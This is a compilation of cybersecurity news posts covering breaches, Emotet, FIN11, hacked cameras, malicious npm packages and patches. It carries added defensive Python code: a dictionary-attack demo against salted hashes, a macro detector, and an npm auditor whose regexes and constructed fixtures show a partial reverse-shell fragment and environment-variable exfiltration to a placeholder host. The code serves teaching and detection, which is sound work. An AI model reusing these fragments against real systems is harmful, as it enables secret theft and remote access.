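    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def dictionary_attack(records, wordlist):
    """What a breach buyer does: try every wordlist entry against every leaked record.
    The per-user salt means no precomputed table serves all users, so the attacker
    pays len(records) * len(wordlist) slow hashes, which is why only weak passwords fall."""
    cracked = {}
    for user, record in records.items():
        for guess in wordlist:
            if verify_password(guess, record):
                cracked[user] = guess
                break
    return cracked


def demo():
    # Constructed breach sample: three forum users, two of them sharing a weak password.
    users = {
        "alice": hash_password("password123"),
        "bob": hash_password("password123"),
        "carol": hash_password("correct horse battery staple"),
    }
    # Same password, different records: the salt hides password reuse across accounts.
    same_record = users["alice"] == users["bob"]
    wordlist = ["123456", "password", "password123", "albion", "qwerty", "letmein"]
    return same_record, dictionary_attack(users, wordlist)


if __name__ == "__main__":
    same_record, cracked = demo()
    print("identical records for identical passwords:", same_record)
    print("cracked:", cracked)
```

Salting and cost buy time; they do not rescue a password that appears in the attacker’s wordlist, which is exactly the residual risk the company’s notice describes and why a forced reset is the right response.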

In response to the data breach, the game maker notified the forum members about the intrusion and asked them to reset passwords.

The company notified the authorities but did not reveal the number of impacted users. The game maker said it has addressed the flaw exploited in the attack.

“So far we have prioritized fixing vulnerabilities and informing players about this incident,” Sandbox Interactive said.

The game is believed to have more than 2.5 million players, while the number of registered members of the forum was 293,602 at the time of the attack.

Pierluigi Paganini

(SecurityAffairs – hacking, Albion Online)

The post The forum of the popular Albion Online game was hacked appeared first on Security Affairs.

New Emotet campaign uses a new ‘Windows Update’ attachment

After a short pause, experts spotted a new Emotet malware campaign on October 14th in which the crooks began using a new ‘Windows Update’ attachment.

After a short interruption, a new Emotet malware campaign was spotted by the experts in October. Threat actors began using new Windows Update attachments in a spam campaign aimed at users worldwide.

The spam campaign uses a new malicious attachment that pretends to be a message from Windows Update and tricks victims by recommending that they upgrade Microsoft Word.

The Emotet banking trojan has been active since at least 2014; the botnet is operated by a threat actor tracked as TA542. In mid-August, the malware was employed in a fresh COVID-19-themed spam campaign.

Recent spam campaigns used messages with malicious Word documents, or links to them, pretending to be an invoice, shipping information, COVID-19 information, resumes, financial documents, or scanned documents.

The infamous banking trojan is also used to deliver other malicious code, such as the TrickBot and QBot trojans, or ransomware such as Conti (via TrickBot) and ProLock (via QBot).

Emotet is modular malware: its operators can ship new Dynamic Link Libraries to extend its capabilities.

Recently, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to warn of a surge of Emotet attacks that have targeted multiple state and local governments in the U.S. since August.

During that time, the agency’s EINSTEIN Intrusion Detection System has detected roughly 16,000 alerts related to Emotet activity.

The new campaign was observed on October 14th, the attackers are using multiple lures, including invoices, purchase orders, shipping information, COVID-19 information, and information about President Trump’s health.

The spam messages come with malicious Word (.doc) attachments or include links to download the bait document.

Upon opening the attachment, users are instructed to click ‘Enable Content’; doing so executes the malicious macros and starts the infection process.
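Because the infection only starts when the macro runs, the cheapest control is to recognise macro-bearing attachments before the user ever sees the ‘Enable Content’ prompt. The following added example (not code from BleepingComputer or from any Emotet research) is a triage heuristic for Word attachments: it identifies whether the bytes are a legacy OLE2 .doc or an OOXML zip, looks for the storage names and parts that only exist when a VBA project is embedded, and notes an OOXML file shipped under a .doc extension. The sample files are constructed in memory and are not real Emotet documents; a full OLE parser such as oletools’ olevba is the proper tool for production triage, and this heuristic is assumed adequate only for first-pass sorting.

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy binary Office (compound file) signature
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML (.docx/.docm) is a zip archive
# OLE directory-entry names that only appear when a VBA project is embedded (stored UTF-16LE).
OLE_VBA_MARKERS = [s.encode("utf-16-le") for s in ("_VBA_PROJECT", "Macros")]
MACRO_CONTENT_TYPE = b"application/vnd.ms-word.document.macroEnabled.main+xml"


def triage_attachment(filename, data):
    """Heuristic triage: which container is this, and does it carry VBA?"""
    verdict = {"file": filename, "container": "unknown", "has_vba": False, "notes": []}
    if data.startswith(OLE_MAGIC):
        verdict["container"] = "ole2"
        hits = [m.decode("utf-16-le") for m in OLE_VBA_MARKERS if m in data]
        if hits:
            verdict["has_vba"] = True
            verdict["notes"].append("VBA storage names present: " + ", ".join(hits))
    elif data.startswith(ZIP_MAGIC):
        verdict["container"] = "ooxml"
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
                if any(n.lower().endswith("vbaproject.bin") for n in names):
                    verdict["has_vba"] = True
                    verdict["notes"].append("vbaProject.bin part present")
                if "[Content_Types].xml" in names and MACRO_CONTENT_TYPE in zf.read("[Content_Types].xml"):
                    verdict["has_vba"] = True
                    verdict["notes"].append("macroEnabled content type declared")
        except zipfile.BadZipFile:
            verdict["notes"].append("zip container is damaged")
        if filename.lower().endswith(".doc"):  # OOXML renamed to .doc to look like a legacy document
            verdict["notes"].append("extension .doc but container is OOXML")
    return verdict


def _build_ooxml(with_vba):
    """Constructed minimal OOXML container; the VBA part is placeholder bytes, not a real project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        override = b'<Override PartName="/word/document.xml" ContentType="' + MACRO_CONTENT_TYPE + b'"/>'
        zf.writestr("[Content_Types].xml", b"<Types>" + (override if with_vba else b"") + b"</Types>")
        zf.writestr("word/document.xml", b"<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\x00" * 64)
    return buf.getvalue()


# Constructed samples: OLE header plus the directory-name strings the heuristic keys on.
SAMPLES = {
    "invoice.doc": OLE_MAGIC + b"\x00" * 64 + "Macros".encode("utf-16-le")
                   + b"\x00" * 16 + "_VBA_PROJECT".encode("utf-16-le"),
    "report.doc": OLE_MAGIC + b"\x00" * 64 + "WordDocument".encode("utf-16-le"),
    "shipping.doc": _build_ooxml(True),
    "notes.docx": _build_ooxml(False),
}


def triage_all(samples=SAMPLES):
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage_all().items():
        print(name, verdict["container"], "VBA" if verdict["has_vba"] else "no VBA", verdict["notes"])
```

Run at the mail gateway, a positive verdict is a reason to quarantine or at least strip the attachment, regardless of which lure template the document body shows; template knowledge is useful for hunting, but the macro itself is the invariant.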

“To trick users into enabling the macros, Emotet uses various document templates, including pretending to be created on iOS devices, Windows 10 Mobile, or that the document is protected.” reported BleepingComputer.

The recent campaign employed a new template that pretends to be a message from Windows Update urging the update of Microsoft Word to correctly view the document.

Below is the message displayed to users:

Windows Update
Some apps need to be updated
These programs need to be upgrade because they aren't compatible with this file format.
* Microsoft Word
You need to click Enable Editing and then click Enable Content.

Researchers recommend sharing knowledge about malicious document templates used by Emotet in order to quickly identify them and avoid being infected.

Pierluigi Paganini

(SecurityAffairs – hacking, Emotet)

The post New Emotet campaign uses a new ‘Windows Update’ attachment appeared first on Security Affairs.

Hackers claim to have compromised 50,000 home cameras and posted footage online

A hacker collective claims to have hacked over 50,000 home security cameras and published their footage online, some of them on adult sites.

A group of hackers claims to have compromised over 50,000 home security cameras and published their private footage online.

Some of the footage was published on adult sites, and experts reported that the crooks are offering lifetime access to the entire collection for US$150.

The news was reported by The New Paper, which also confirmed that over 70 members already paid the US$150 subscription for lifetime access to the loot.

“Clips from the hacked footage have been uploaded on pornographic sites recently, with several explicitly tagged as being from Singapore.” reported The New Paper.

“The group, which can be found on social messaging platform Discord, has almost 1,000 members across the globe. As of Saturday, it has claimed to have shared more than 3TB of clips with over 70 members who paid a subscription fee of US$150 (S$203) for lifetime access.”

The videos show people of varying ages in compromising positions, in some cases undressed.

Most of the videos appear to belong to people in Singapore; other private footage comes from people living in Thailand, South Korea, and Canada.

The gang uses the instant messaging app Discord, has nearly 1,000 members, and focuses on hacking security cameras.

As proof of the hacks, the gang is offering a free sample containing 700 megabytes of data, including over 4,000 clips and pictures. It also offers its customers access to all of the hijacked cameras.

“The group claims to have a list of more than 50,000 hacked cameras that members can access. It also claims that VIP members will be taught how to “explore, watch live and even record” hacked cameras through tutorials and personalised sessions.” continues the article.

The news is not surprising; unfortunately, IoT devices, including IP cameras, are often deployed without proper security measures.

At the time of publishing this post, it is still unclear how the hackers compromised the IP cameras; they likely exploited vulnerabilities in the devices or simply guessed the weak passwords protecting them.

Bear in mind that accessing these IP cameras can be a serious crime; where the victims are under the age of 16, the users could be charged with child pornography offenses.

“As worrying as it may seem, this comes as a clear reminder that when cameras are placed on the internet, they must be properly installed with security in mind. When smart devices are set up, they are still regularly placed around the home with no second thought for privacy,” said ESET Security Specialist Jake Moore.

In 2017, thousands of IP cameras were hijacked by the Persirai IoT botnet, which targeted more than 1,000 IP camera models.

In June 2017, security experts at F-Secure discovered dozens of vulnerabilities in tens of thousands of Internet-connected cameras from the China-based manufacturer Foscam.

The flaws could be exploited by attackers to take over the Internet-connected cameras, upload and download files from the built-in FTP server, and view video feeds.

Pierluigi Paganini

(SecurityAffairs – hacking, IP cameras)

The post Hackers claim to have compromised 50,000 home cameras and posted footage online appeared first on Security Affairs.

Most US states show signs of a vulnerable election-related infrastructure

Leading up to the presidential election, 75% of the 56 U.S. states and territories showed signs of a vulnerable IT infrastructure, a SecurityScorecard report reveals. Since most state websites offer access to voter and election information, these findings may indicate unforeseen issues leading up to, and following, the US election.

Election infrastructure: High-level findings

Seventy-five percent of U.S. states and territories’ overall cyberhealth is rated a ‘C’ or below; 35% have a ‘D’ or below. … More

The post Most US states show signs of a vulnerable election-related infrastructure appeared first on Help Net Security.

FIN11 gang started deploying ransomware to monetize its operations

The financially-motivated hacker group FIN11 has started spreading ransomware to monetize its cyber criminal activities.

The financially-motivated hacker group FIN11 has switched tactics, adopting ransomware as its main monetization method.

The group carried out multiple high-volume operations targeting companies across the world, most of them in North America and Europe.

In recent attacks, the group was observed deploying the Clop ransomware into the networks of its victims.

Since August, FIN11 started targeting organizations in many industries, including defense, energy, finance, healthcare, legal, pharmaceutical, telecommunications, technology, and transportation.

Researchers from FireEye’s Mandiant observed FIN11 hackers using spear-phishing messages distributing a malware downloader dubbed FRIENDSPEAK.

“Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands.” reads the analysis published by FireEye. “The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.”

The attack chain starts when the victims enable the macro embedded in an Excel spreadsheet that came with the phishing e-mails.

The macros download and execute the FRIENDSPEAK code, which in turn downloads the MIXLABEL malware.

Experts also reported that the threat actor modified the macros in the Office documents used as bait and added geofencing techniques.

Mandiant researchers highlighted an important overlap with operations conducted by the TA505 cybercrime gang, which has been active since 2014 and focuses on the retail and banking sectors.

TA505 also deployed the Clop ransomware in its malware campaigns and recently started exploiting the ZeroLogon critical flaw to compromise targeted organizations.

“Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware.” reads the analysis. “Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.”


The experts pointed out that FIN11 does not necessarily abandon a target after dropping the Clop ransomware and losing access: in at least one case the group re-compromised the same organization a few months later.

The researchers believe FIN11 operates from the Commonwealth of Independent States (CIS – former Soviet Union countries).

The experts observed Russian-language file metadata in the malware code and reported that the Clop ransomware was deployed only on machines whose keyboard layout indicated a location outside CIS countries.

Mandiant researchers speculate FIN11 will continue to target organizations with sensitive proprietary data and that will likely pay the ransom to recover their operations after the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, FIN11)

The post FIN11 gang started deploying ransomware to monetize its operations appeared first on Security Affairs.

Microsoft released out-of-band Windows fixes for 2 RCE issues

Microsoft released two out-of-band security updates to address remote code execution (RCE) bugs in the Microsoft Windows Codecs Library and Visual Studio Code.

Microsoft has released two out-of-band security updates to address two remote code execution (RCE) vulnerabilities that affect the Microsoft Windows Codecs Library and Visual Studio Code.

The two vulnerabilities, tracked as CVE-2020-17022 and CVE-2020-17023, have been rated Important severity.

The CVE-2020-17022 is a remote code execution vulnerability that exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker can exploit the vulnerability to execute arbitrary code.

“Exploitation of the vulnerability requires that a program process a specially crafted image file.” reads the advisory. “The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory.”

The CVE-2020-17022 vulnerability affects all devices running Windows 10, version 1709 or later, and a vulnerable library version.

Windows 10 devices are not affected in their default configuration; Microsoft notes that “only customers who have installed the optional HEVC or ‘HEVC from Device Manufacturer’ media codecs from Microsoft Store may be vulnerable.”

The CVE-2020-17022 flaw was reported to Microsoft by Dhanesh Kizhakkinan from FireEye.

The CVE-2020-17023 vulnerability is a remote code execution vulnerability in Visual Studio Code. An attacker can trigger the flaw by tricking a user into opening a malicious ‘package.json’ file and could then run arbitrary code in the context of the current user.

“If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the advisory.

“To exploit this vulnerability, an attacker would need to convince a target to clone a repository and open it in Visual Studio Code. Attacker-specified code would execute when the target opens the malicious ‘package.json’ file. The update addresses the vulnerability by modifying the way Visual Studio Code handles JSON files.”

The CVE-2020-17023 vulnerability was reported by Justin Steven.

The IT giant did not provide any mitigating measures or workarounds for the two vulnerabilities.

According to Microsoft, neither vulnerability is being exploited in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Windows)

The post Microsoft released out-of-band Windows fixes for 2 RCE issues appeared first on Security Affairs.

Iran-linked Silent Librarian APT targets universities again

Iran-linked cyberespionage group Silent Librarian has launched a new phishing campaign aimed at universities around the world.

Iran-linked APT group Silent Librarian has launched another phishing campaign targeting universities around the world.

Silent Librarian, also tracked as Cobalt Dickens and TA407, has targeted dozens of universities on four continents in the last couple of years.

In August 2018, the security firm SecureWorks uncovered a phishing campaign carried out by the APT group targeting universities worldwide. The operation involved sixteen domains hosting more than 300 spoofed websites for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

Since mid-September, researchers from Malwarebytes observed a new spear-phishing campaign carried out by the group that is expanding its target list to include more countries.

Silent Librarian hackers targeted both employees and students at the universities; experts noticed that the threat actor set up new infrastructure to stay ahead of takedowns.

“Considering that Iran is dealing with constant sanctions, it strives to keep up with world developments in various fields, including that of technology. As such, these attacks represent a national interest and are well funded,” states Malwarebytes. “The new domain names follow the same pattern as previously reported, except that they swap the top level domain name for another.”

The threat actor used domain names following a pattern observed in past campaigns, although they use a different top-level domain name (the “.me” TLD instead of “.tk” and “.cf”).


The hackers put the phishing hostnames behind Cloudflare in an attempt to hide the real hosting origin. Nevertheless, Malwarebytes was able to identify some of the infrastructure, which was located in Iran, likely because it is considered a bulletproof hosting option given the lack of cooperation between US and European law enforcement and the local police in Iran.

“Clearly we only uncovered a small portion of this phishing operation. Although for the most part the sites are taken down quickly, the attacker has the advantage of being one step ahead and is going for many possible targets at once,” Malwarebytes concludes.

The security firm also published Indicators of Compromise (IoCs) for this campaign.

Pierluigi Paganini

(SecurityAffairs – hacking, Silent Librarian)

The post Iran-linked Silent Librarian APT targets universities again appeared first on Security Affairs.

Security Affairs newsletter Round 286

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Hackers targeted the US Census Bureau network, DHS report warns
Tyler Technologies finally paid the ransom to receive the decryption key
Underestimating the FONIX – Ransomware as a Service could be an error
APT groups chain VPN and Windows Zerologon bugs to attack US government networks
Microsoft partnered with other security firms to takedown TrickBot botnet
Researchers found alleged sensitive documents of NATO and Turkey
Researchers received $288,500 for 32 out of 55 issues reported to Apple
Adobe addresses a critical security flaw in Adobe Flash Player
Five Eyes nations plus India and Japan call for encryption backdoor once again
IoT Cybersecurity: 5 Major Vulnerabilities and How to Tackle Them
Leading Law firm Seyfarth Shaw discloses ransomware attack
Microsoft October 2020 Patch Tuesday fixes 87 flaws, including 21 RCEs
The British government aims at improving its offensive cyber capability
German authorities raid the offices of the FinFisher surveillance firm
Google researcher found BleedingTooth flaws in Linux Bluetooth
Norway blames Russia for cyber attack on Parliament
Talos experts disclosed unpatched DoS flaws in Allen-Bradley adapter
The G7 expresses its concern over ransomware attacks
Crooks hit Puerto Rico Firefighting Department Servers
Egregor ransomware gang leaked data alleged stolen from Ubisoft, Crytek
Iran acknowledged cyberattacks on two governmental departments
U.S. Bookstore giant Barnes & Noble hit by cyberattack
Zoom now supports end-to-end encrypted (E2EE) calls
Adobe fixes Magento flaws that can lead to code execution
Almost 800,000 SonicWall VPN appliances online are vulnerable to CVE-2020-5135
Breach at Dickey’s Barbecue Pit compromises 3 million Cards
Britain’s information commissioner fines British Airways for 2018 Hack
Juniper fixes tens of flaws affecting the Junos OS

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 286 appeared first on Security Affairs.

QQAAZZ crime gang charged for laundering money stolen by malware gangs

Multiple members of QQAAZZ multinational cybercriminal gang were charged for providing money-laundering services to high-profile malware operations.

20 members of the multinational cybercriminal group QQAAZZ were charged this week in the US, Portugal, Spain, and the UK for providing money-laundering services.

The arrests are the result of an unprecedented international law enforcement operation, coordinated by Europol and dubbed Operation 2BaGoldMule, involving agencies from 16 countries. Police executed more than 40 house searches in Latvia, Bulgaria, the United Kingdom, Spain, and Italy.

The police also seized an extensive bitcoin mining operation in Bulgaria associated with QQAAZZ.

According to law enforcement bodies, the gang provides services to multiple malware operations, including Dridex, GozNym, and Trickbot.

Since 2016, QQAAZZ has attempted to launder tens of millions stolen from victims by some of the world’s foremost cybercriminals.

“Comprised of several layers of members mainly from Latvia, Georgia, Bulgaria, Romania, and Belgium, the QQAAZZ network opened and maintained hundreds of corporate and personal bank accounts at financial institutions throughout the world to receive money from cybercriminals who stole it from accounts of victims.” reads the press release published by Europol. “The funds were then transferred to other QQAAZZ-controlled bank accounts and sometimes converted to cryptocurrency using ‘tumbling’ services designed to hide the original source of the funds.  After taking a fee of up to 50-percent, QQAAZZ returned the balance of the stolen funds to their cybercriminal clientele.”  

The QQAAZZ gang advertised its services as a ‘global, complicit bank drops service’ on multiple Russian-speaking online cybercriminal forums.


Members of the gang used instant messaging apps to instruct their clients on how to transfer the stolen funds to bank accounts under their control. The bank accounts were opened by money mules using both fake and legitimate Polish and Bulgarian ID documents.

QQAAZZ also leveraged dozens of shell companies to open additional bank accounts.

The money laundering operation involved hundreds of corporate and personal bank accounts at financial institutions throughout the world.

Some of the money was also “converted to cryptocurrency using ‘tumbling’ services designed to hide the original source of the funds.”

“The funds were then transferred to other QQAAZZ-controlled bank accounts and sometimes converted to cryptocurrency using “tumbling” services designed to hide the original source of the funds.” states the DoJ. “After taking a fee of up to 40 to 50 percent, QQAAZZ returned the balance of the stolen funds to their cybercriminal clientele.”

“Cybercriminals are constantly exploring new possibilities to abuse technology and financial frameworks to victimise millions of users in a moment from anywhere in the world,” said Edvardas Šileris, Head of Europol’s European Cybercrime Centre.

“Today’s operation shows how through a proper law enforcement international coordination we can turn the table on these criminals and bring them to justice.”

Pierluigi Paganini

(SecurityAffairs – hacking, QQAAZZ cybercrime gang)

The post QQAAZZ crime gang charged for laundering money stolen by malware gangs appeared first on Security Affairs.

TikTok launched a public bug bounty program

Chinese video-sharing social networking service TikTok announced this week the launch of a public bug bounty program in collaboration with HackerOne.

The popular Chinese video-sharing social networking service TikTok has launched this week a public bug bounty program through the HackerOne platform.

White hat hackers are invited to report security flaws in TikTok websites, including several subdomains, and both Android and iOS apps.

The company is offering between $1,700 and $6,900 for high-severity flaws, while the payout for a critical issue can go up to $14,800.

“We encourage security researchers to focus their efforts on finding security vulnerabilities demonstrating meaningful impact. Our rewards are based on severity per CVSS (the Common Vulnerability Scoring Standard).” reads the program description.

Rewarding white hat hackers for reporting security flaws is not new for the Chinese firm, which claims to have already paid out more than $40,000 through its existing bug bounty program.

The company has had a Vulnerability Reporting Policy and follows a Coordinated Disclosure Policy with a waiting period of 90 days from submission.

“This partnership will help us to gain insight from the world’s top security researchers, academic scholars and independent experts to better uncover potential threats and make our security defenses even stronger,” said Luna Wu of TikTok’s Global Security Team.


President Trump is trying to ban TikTok in the United States due to security and privacy concerns. TikTok has denied any accusation of sharing data with the Beijing government. TikTok confirmed that all US user data is stored in the US, with a backup in Singapore.

TikTok challenged the decision in a US court and the judge blocked the President’s request to ban the Chinese company in the country.

The US Government is pressuring TikTok’s parent firm ByteDance to sell its U.S. operations to an American company.

Pierluigi Paganini

(SecurityAffairs – hacking, TikTok)

The post TikTok launched a public bug bounty program appeared first on Security Affairs.

Four npm packages found opening shells and collecting info on Linux, Windows systems

On Thursday, four JavaScript packages were removed from the npm portal because they were found to contain malicious code.

npm staff removed four JavaScript packages from the portal because they contained malicious code. npm is the largest package repository for any programming language.

The four packages, which had a total of one thousand downloads, are plutov-slack-client, nodetest1010, nodetest199 and npmpubman.

“Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer,” the npm security team said.

“The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.”

The researcher AX Sharma, who analyzed the packages, revealed that plutov-slack-client, nodetest1010, and nodetest199 share identical code.

Experts warn that systems running applications that imported one of these packages should be considered potentially compromised, because the three JavaScript libraries opened web shells on the computers running them.

A web shell is code, often written in typical web development programming languages (e.g., ASP, PHP, JSP), that attackers implant on web servers to gain remote access and code execution.

npmpubman, unlike the other packages, was found to collect user data from environment variables and upload the gathered information to a remote host.

The malicious code works on both Windows and *nix operating systems, including Linux, FreeBSD and OpenBSD.

One of the packages was uploaded to the npm portal in May, while the remaining ones were uploaded in September 2018.

“It is possible that all four packages were authored by the same attacker(s) despite conflicting data provided in the package.json manifests.” reported Bleeping Computer.

“In a real-world scenario, npmpubman could be used as a part of an attacker’s reconnaissance efforts to collect information about a system, whereas the other packages establish a direct connection between the attacker’s and the victim’s computers.”

In August, the npm security team removed the JavaScript library “fallguys” from the npm portal because it contained malicious code used to steal sensitive files from infected users’ browsers and Discord application.
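As an added example (not npm's or the researcher's tooling), the Python below applies heuristic checks for the two behaviours described above, a shell process tied to a network socket and environment-variable collection followed by an upload, plus install-time lifecycle hooks in package.json. The package contents, rule set and package names are constructed.

```python
"""Heuristic audit of an npm package's files for install-time hooks, shell
spawning tied to a socket, and environment-variable exfiltration.
Added example, not npm's code; all sample packages below are constructed."""
import json
import re

# (finding name, regex) applied to each .js file in the package.
RULES = [
    ("child_process", re.compile(r"require\(\s*['\"]child_process['\"]\s*\)")),
    ("shell_spawn", re.compile(
        r"\bspawn\(\s*['\"](?:/bin/sh|/bin/bash|sh|bash|cmd\.exe|powershell(?:\.exe)?)['\"]")),
    ("net_connect", re.compile(r"\bnet\.(?:connect|createConnection)\(")),
    ("env_dump", re.compile(r"JSON\.stringify\(\s*process\.env\s*\)")),
    ("http_request", re.compile(r"\b(?:https?)\.request\(")),
]
# Scripts under these keys run automatically at install time.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")


def audit_package(files):
    """files: {path: content}. Returns {'findings': [...], 'verdict': str}.
    verdict is 'reverse_shell', 'env_exfil', 'suspicious' or 'clean'."""
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(("lifecycle_hook", "package.json", f"{hook}: {cmd}"))
    for path, src in files.items():
        if not path.endswith(".js"):
            continue
        for name, rx in RULES:
            for m in rx.finditer(src):
                line = src.count("\n", 0, m.start()) + 1
                findings.append((name, path, line))
    names = {f[0] for f in findings}
    if {"child_process", "net_connect", "shell_spawn"} <= names:
        verdict = "reverse_shell"      # shell process plus outbound socket
    elif {"env_dump", "http_request"} <= names:
        verdict = "env_exfil"          # environment collected and posted out
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"findings": findings, "verdict": verdict}


# Constructed sample: socket plus shell process (the wiring between them is
# deliberately omitted), run automatically via a postinstall hook.
SHELL_PACKAGE = {
    "package.json": json.dumps({"name": "example-pkg", "version": "1.0.0",
                                "main": "index.js",
                                "scripts": {"postinstall": "node index.js"}}),
    "index.js": ('const cp = require("child_process");\n'
                 'const net = require("net");\n'
                 '// constructed fragment for the audit example\n'
                 '// (no working shell here)\n'
                 'const sock = net.connect(4444, "192.0.2.1");\n'
                 'const sh = cp.spawn("/bin/sh", []);\n'),
}
# Constructed sample: environment variables serialized and sent out.
ENV_PACKAGE = {
    "package.json": json.dumps({"name": "env-pkg", "version": "1.0.0"}),
    "index.js": ('const https = require("https");\n'
                 'const body = JSON.stringify(process.env);\n'
                 'const req = https.request({hostname: "example.invalid", method: "POST"});\n'),
}
CLEAN_PACKAGE = {
    "package.json": json.dumps({"name": "tidy-pkg", "version": "0.1.0", "main": "index.js"}),
    "index.js": "module.exports = (a, b) => a + b;\n",
}

if __name__ == "__main__":
    for label, pkg in (("shell", SHELL_PACKAGE), ("env", ENV_PACKAGE), ("clean", CLEAN_PACKAGE)):
        print(label, audit_package(pkg))
```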

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post Four npm packages found opening shells and collecting info on Linux, Windows systems appeared first on Security Affairs.

Google warned users of 33,015 nation-state attacks since January

Google delivered over 33,000 alerts to its users during the first three quarters of 2020 to warn them of attacks from nation-state actors.

Google delivered 33,015 alerts to its users during the first three quarters of 2020 to warn them of phishing attacks, launched by nation-state actors, targeting their accounts.

Google sent 11,856 government-backed phishing warnings during Q1 2020, 11,023 in Q2 2020, and 10,136 in Q3 2020.

Shane Huntley, Director at Google’s Threat Analysis Group (TAG), revealed that his team has shared its findings with the affected campaigns and the Federal Bureau of Investigation.

The IT giant pointed out that major events like elections and COVID-19 represent opportunities for threat actors.

The trend in the nation-state attacks is consistent with what others have subsequently reported.


“Overall, we’ve seen increased attention on the threats posed by APTs in the context of the U.S. election. U.S government agencies have warned about different threat actors, and we’ve worked closely with those agencies and others in the tech industry to share leads and intelligence about what we’re seeing across the ecosystem.” reads the report published by Google TAG.

Since last summer, the TAG team has tracked a large spam network linked to China that is running an influence operation on multiple platforms, primarily YouTube. The threat actor behind this campaign primarily acquired or hijacked existing accounts and used them to spread content crafted for its purposes.

According to Google, the alerts are shown to up to 0.1% of all Gmail accounts. The company’s alert advises Gmail users to take several measures to secure their accounts, such as enrolling in the Advanced Protection Program, keeping software up to date, enabling Gmail 2-step verification, as well as using Google Authenticator and/or a physical security key for 2-step verification.

As the COVID-19 pandemic evolves, Google experts warn that threat actors are evolving their tactics as well. Over the summer, Google observed threat actors from China, Russia, and Iran targeting pharmaceutical companies and researchers involved in the development of a vaccine.

In September, Google experts started to observe attacks carried out by multiple North Korea-linked APT groups aimed at COVID-19 researchers and pharmaceutical companies, especially those based in South Korea.

This week, the Google Cloud team revealed that in September 2017 it mitigated a DDoS attack that reached 2.54 Tbps, the largest DDoS attack ever recorded.

This attack is the largest DDoS attack recorded to date, and according to a report published by the Google Threat Analysis Group (TAG) it was carried out by a state-sponsored threat actor.

Pierluigi Paganini

(SecurityAffairs – hacking, Google TAG)

The post Google warned users of 33,015 nation-state attacks since January appeared first on Security Affairs.

UK NCSC recommends organizations to fix CVE-2020-16952 SharePoint RCE flaw asap

The U.K. National Cyber Security Centre (NCSC) issued an alert to urge organizations to patch CVE-2020-16952 RCE vulnerability in MS SharePoint Server.

The U.K. National Cyber Security Centre (NCSC) issued an alert to warn of the risk of exploitation of the CVE-2020-16952 remote code execution (RCE) vulnerability in Microsoft SharePoint Server and to urge organizations to address the flaw.

Attackers could exploit this vulnerability to run arbitrary code and execute operations in the context of the local administrator on vulnerable SharePoint servers.

The issue is caused by improper validation of user-supplied data and can be exploited when a user uploads a specially crafted SharePoint application package to a vulnerable version of SharePoint.

The vulnerability affects Microsoft SharePoint Foundation 2013 Service Pack 1, Microsoft SharePoint Enterprise Server 2016, and Microsoft SharePoint Server 2019, while SharePoint Online as part of Office 365 is not impacted.

“The NCSC strongly advises that organizations refer to the Microsoft guidance referenced in this alert and ensure the necessary updates are installed in affected SharePoint products,” reads the alert. “The NCSC generally recommends following vendor best practice advice in the mitigation of vulnerabilities. In the case of this SharePoint vulnerability, it is important to install the latest updates as soon as practicable.”

The server-side include (SSI) vulnerability CVE-2020-16952 was reported by the researcher Steven Seeley from Qihoo 360 Vulcan Team, who also provided a proof-of-concept exploit for the RCE flaw.

An exploit module for the open-source Metasploit penetration testing framework is also available; it works on SharePoint 2019 on Windows Server 2016.

Security experts recommend applying the October 2020 SharePoint security updates ([1],[2],[3]).

Experts pointed out that SharePoint servers are widely used in enterprise environments, which makes this kind of vulnerability particularly dangerous.

The UK NCSC confirms that both CVE-2020-16952 and CVE-2015-1641 flaws are included in the list of most exploited vulnerabilities since 2016 published in a joint advisory by the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI).

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2020-16952)

The post UK NCSC recommends organizations to fix CVE-2020-16952 SharePoint RCE flaw asap appeared first on Security Affairs.

Google mitigated a 2.54 Tbps DDoS attack in 2017, the largest DDoS ever seen

The Google Cloud team revealed that in September 2017 it mitigated a DDoS attack that reached 2.54 Tbps, the largest DDoS attack ever recorded.

